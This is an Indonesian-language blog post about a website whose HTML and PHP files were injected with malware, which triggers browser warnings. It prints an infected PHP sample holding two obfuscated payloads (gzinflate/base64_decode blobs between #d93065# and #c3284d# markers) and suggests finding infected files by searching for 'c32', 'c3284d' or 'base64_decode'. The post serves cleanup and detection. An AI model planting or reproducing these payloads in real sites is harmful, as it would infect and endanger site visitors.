Karena beberapa file HTML dan PHP kena injeksi, tampaknya Google akhirnya menganggap situs tersebut mengandung malware. Sehingga di sisi client, khususnya bagi pengguna Firefox, akan tampil pesan peringatan. Tentunya ini akan sangat mengganggu bagi pengunjung. Situs seolah-olah sebagai sumber bahaya.
File HTML dan PHP yang dianggap kena injeksi akan disisipi beberapa baris perintah. Contoh sisipannya adalah sbb :
<?php
include ("header.php");
include ("menu.php");
#d93065#
echo(gzinflate(base64_decode("3ZPbjpswEIZfZWupkilO4hmbU1nai1WfoJdRLlggC9osEKCNVtG+e2fsJNuV+gRFstB4Tt8/tu/u/o/vfq6mbly+LdPr+VjUQ/XrpemXdTU15dL8ODRsSTGKID+uy3Fs+vqh7Q61PIaC9t6qcqlaeTwF57ZYacBNlHOlx2qui3EalmF5HZsVXgMfy9NTcJ7nYrvL94Vsg+9S7Kfh5aEtpwcRiqFuRPBViLwpTl1fD6etaGj7d3kQu7wvtmAUamW0VtZalWUKjVUGE2W1VQCabFRgUmWTmGyrkPaMTZ3fapWkClJKpiKgUSGmCjNQ1lC0BhVTMRspG8VcGxBdlAWuFbvaxvi/TVRGwRC5TllCWCnlouMCwszQmzGzKMjIa4wzb5gxrZSj0WczBC3DXPoD15XEhUD2roqA2c862A/8JybX7gpDpZHoHatl3ea9XsrxyUWZubXX1qU7t6Z2PCqS67XRUDWfgXFzimlqzO5PhE6DkDw6t4goNnZe9F5HxqlMwjPVfk63zhc3elA/1fSWrfVfOi9z4Mvg5mBvuhwgm9YdNzgd0T91QUojJR2WpgzULKNrssu7vfT3b319EcF+mGRXxCtcAa98BbEOu08F0u3uwjA4PxddTjd7nsOfy9T1T9v9Tvbb591Gdp9l+6UNQkoL6M00UlB9CEQ4z2S+3W8ub/AP")));
#/d93065#
#c3284d#
echo(gzinflate(base64_decode("bVNNb5wwFPwtRWoFRfvWfv7AiNBL1F/QY5QDYtmCsgEWaLfpKv+9Y8MmOfQA4jHPM/PG9t1cT924fJvLKCqW6eV6Lg9D/eu56Reqp6Zamu+nxldxNEZJcaZqHJv+cN92p0McSVZR2ifFa10tdRufL8m1LXdC2n0WyKpynIZlWF7G5ou5df39UyfXprx0/WG4PERNlEa/K7xO0WPRlxFbUoK0EGSMIZk7UkaSVpaMMMQsSGlH0mkyua+BS0Pa6oA7QVJmxBrLGbDQaGdSzpHRvmbKLboBZyKwS6dIenYws+LArvFwLijXJDXE5SoezIBNg9UvZ3xLhXYD3BnfznmG1TqUb16hyBDPQQ6hwAYD1gUrcKp9swS3UGiEprdm/eAgA4lxmzXgXsvj1g9mSIEiWGHArJETr4N7bZG/08FbyNHnhFw3ceG2HIByFgbT+cYWBhVb6h9yMisuEaXE/9W8XXdBcsDlhgd3H3btFtymvsXKcvUaave+mqF+G/WWhNiSgNDbaL7Nt2ufYNi04OU/sykoZRiFkTNGsf5ARDSPpw7nm3C+u2O8nku63YLkOExxV9od76R/ip20Mu0+lbzjokvT5PpUdsVczumPZer6n3Schuf7tpruh0MT9w9Pj/u4+xy3X9sk5QRXpYlnvF/v9tvN+wc=")));
#/c3284d#
?>
Tampaknya pola sisipan ini hampir sama di semua file HTML dan PHP yang terkena injeksi, bahwa file yang kena injeksi akan terdapat kata "c32". Sehingga untuk mengetahui file mana saja yang terkena injeksi, cukup menggunakan perintah baris dengan melihat file yang mengandung "c32".
Kata kunci lain yang bisa digunakan untuk mengetahui file yang terkena injeksi adalah : "c3284d" dan "base64_decode". Namun kata kunci ini belum dicoba. Yang sudah dicoba adalah menggunakan kata kunci "c32".
No comments:
Post a Comment